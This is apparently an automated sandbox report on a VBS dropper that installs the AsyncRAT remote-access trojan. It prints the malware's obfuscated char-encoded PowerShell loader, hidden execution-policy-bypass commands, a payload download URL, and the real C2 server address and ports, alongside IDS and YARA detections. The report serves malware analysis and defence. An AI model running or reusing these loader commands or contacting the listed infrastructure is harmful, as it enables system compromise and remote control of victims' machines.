har]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[char]([byte]0x4e)+[char]([byte]0x65)+[char]([
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4844, TargetFilename: C:\ProgramData\Cloud\cloud.ps1
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-12T16:39:46.168446+020020355951Domain Observed Used for C2 Detected88.119.175.1539999192.168.2.553510TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-12T16:39:46.168446+020020356071Domain Observed Used for C2 Detected88.119.175.1539999192.168.2.553510TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-12T16:39:46.168446+020028424781Malware Command and Control Activity Detected88.119.175.1539999192.168.2.553510TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "88.119.175.153", "Port": "6606,7707,8808,6666,5555,7777,8888,4444,9999", "Version": "AWS | 3Losh", "MutexName": "AsyncMutex_Ass#$Butt$", "Autorun": "false", "Group": "true"}
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Source: unknownHTTPS traffic detected: 122.201.127.73:443 -> 192.168.2.5:49720 version: TLS 1.2

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 88.119.175.153:9999 -> 192.168.2.5:53510
        Source: Network trafficSuricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 88.119.175.153:9999 -> 192.168.2.5:53510
        Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 88.119.175.153:9999 -> 192.168.2.5:53510
        Source: Network trafficSuricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 88.119.175.153:9999 -> 192.168.2.5:53510
        Source: Yara matchFile source: 22.2.RegSvcs.exe.5190000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000016.00000002.3400152760.0000000005190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: global trafficTCP traffic: 192.168.2.5:53510 -> 88.119.175.153:9999
        Source: global trafficHTTP traffic detected: GET /redro/sasa.gif HTTP/1.1Host: varietydirectoutlet.comConnection: Keep-Alive
        Source: Joe Sandbox ViewASN Name: IST-ASLT IST-ASLT
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: unknownTCP traffic detected without corresponding DNS query: 88.119.175.153
        Source: global trafficHTTP traffic detected: GET /redro/sasa.gif HTTP/1.1Host: varietydirectoutlet.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: varietydirectoutlet.com
        Source: RegSvcs.exe, 0000000D.00000002.3429100433.0000000005A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: RegSvcs.exe, 0000000D.00000002.3429100433.0000000005A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: powershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC0043D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC00001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC0043D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2371780956.000001CC6F208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coyZ
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC0043D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2373810622.000001CC6F316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2373810622.000001CC6F316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micro/fwlink/?LinkId=
        Source: powershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://varietydirectoutlet.com
        Source: powershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://varietydirectoutlet.com/redro/sasa.gif
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownHTTPS traffic detected: 122.201.127.73:443 -> 192.168.2.5:49720 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: Yara matchFile source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1524, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6100, type: MEMORYSTR

        System Summary

        barindex
        Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: 00000016.00000002.3400803278.0000000005286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: 0000000D.00000002.3429100433.0000000005B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: 00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: 0000000D.00000002.3429100433.0000000005A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: Process Memory Space: RegSvcs.exe PID: 1524, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: Process Memory Space: RegSvcs.exe PID: 1524, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: Process Memory Space: RegSvcs.exe PID: 6100, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: Process Memory Space: RegSvcs.exe PID: 6100, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[c
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[cJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.batJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FD2CA92_2_00007FF848FD2CA9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_00B8352022_2_00B83520
        Source: H#0813-186765.vbsInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6223
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6223Jump to behavior
        Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 00000016.00000002.3400803278.0000000005286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 0000000D.00000002.3429100433.0000000005B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 0000000D.00000002.3429100433.0000000005A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: Process Memory Space: RegSvcs.exe PID: 1524, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: Process Memory Space: RegSvcs.exe PID: 1524, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: Process Memory Space: RegSvcs.exe PID: 6100, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: Process Memory Space: RegSvcs.exe PID: 6100, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@34/36@1/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_Ass#$Butt$
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3nhhcke.z1d.ps1Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs"
